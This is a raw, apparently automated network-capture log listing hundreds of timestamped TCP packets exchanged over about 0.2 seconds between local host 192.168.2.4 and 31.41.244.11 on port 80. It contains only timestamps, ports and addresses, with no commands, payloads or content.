                                                                                                                                                                                              Dec 16, 2024 01:01:43.484765053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.485805035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.485856056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.485898972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.485949039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.487225056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.487261057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.487282038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.487310886 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.488308907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.488346100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.488359928 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.488389015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.489377022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.489427090 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.489468098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.489516020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.490564108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.490617037 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.490638971 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.490685940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.491981983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.492018938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.492079020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.492891073 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.493310928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.493320942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.493364096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.494122028 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.494514942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.494565964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.495417118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.495452881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.495501041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.496634007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.496670008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.496680021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.497700930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.497750044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.497791052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.498992920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.499028921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.499042034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.499073982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.500080109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.500179052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.500226974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.501243114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.501298904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.501379013 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.501725912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.502461910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.502558947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.502608061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.503659010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.503711939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.503767967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.504825115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.504875898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.504950047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.505323887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.506042004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.506119967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.506169081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.507189035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.507386923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.507436037 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.508402109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.508450985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.508585930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.509608030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.509629011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.509659052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.509852886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.509898901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.510879040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.510926008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.510932922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.510978937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.512022972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.512063980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.512078047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.512125015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.513164997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.513216972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.513312101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.513360977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.514317036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.514369011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.644876957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.644932032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.644942045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.644973040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.644979000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645020008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645067930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645118952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645868063 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645915031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.645972967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.646022081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.647479057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.647517920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.647542953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.647563934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.648262024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.648313999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.648364067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.648412943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.649511099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.649565935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.649565935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.649616003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.650631905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.650681019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.650755882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.650825977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.651822090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.651875973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.651928902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.652255058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.653003931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.653059959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.653184891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.653253078 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.654273987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.654325962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.654450893 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.654531956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.655384064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.655438900 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.655636072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.655909061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.656739950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.656786919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.656794071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.656920910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.657769918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.657821894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.657918930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.657969952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.659044981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.659082890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.659082890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.659135103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.660146952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.660201073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.660393000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.660443068 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.661393881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.661448002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.661514997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.661564112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.662539005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.662590027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.662647963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.662775040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.663899899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.663937092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.663985968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.663985968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.664952040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.665018082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.665052891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.665172100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.666203976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.666217089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.666245937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.666277885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.667336941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.667393923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.667447090 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.668493032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.668545008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.668675900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.668725014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.669725895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.669780016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.669781923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.669848919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.670871019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.670922995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.670953989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.670994997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.672311068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.672347069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.672360897 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.672382116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.673358917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.673396111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.673413992 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.673439980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.674449921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.674503088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.674628019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.674714088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.675789118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.675837994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.675854921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.675879002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.677105904 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.677144051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.677166939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.677212954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.678170919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.678209066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.678220987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.678253889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.679227114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.679286957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.679364920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.679981947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.680392981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.680614948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.680665970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.681706905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.681742907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.681797981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.681797981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.682795048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.682849884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.682889938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.682934999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.683999062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.684046984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.684128046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.684178114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.685266972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.685327053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.685386896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.685446024 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.686357021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.686423063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.686556101 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.686619043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.687813044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.687849045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.687880993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.687930107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.688724041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.688780069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.688885927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.689018965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.690151930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.690187931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.690217018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.690237045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.691418886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.691454887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.691484928 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.691519022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.692312956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.692419052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.692419052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.692500114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.693485022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.693551064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.693591118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.693639040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.694787979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.694823980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.694844961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.694876909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.696083069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.696120024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.696140051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.696171999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.697179079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.697215080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.697247982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.697283030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.698534012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.698570967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.698595047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.699443102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.699503899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.699587107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.700017929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.700653076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.700706959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.700767040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.700835943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.701925039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.701978922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.701980114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.702064991 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.703171015 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.703208923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.703232050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.703262091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.704241037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.704298973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:43.704340935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:43.704394102 CET4984880192.168.2.431.41.244.11
